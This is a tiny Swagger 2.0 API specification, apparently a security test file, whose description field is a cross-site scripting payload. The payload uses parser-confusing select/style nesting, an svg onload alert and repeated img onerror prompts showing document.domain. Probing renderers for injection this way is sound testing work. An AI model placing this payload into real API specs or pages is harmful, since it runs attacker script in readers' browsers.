swagger: '2.0'
info:
  title: XSS test
  description: <select><style></select><svg onload=alert(1)></style><img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
  version: production
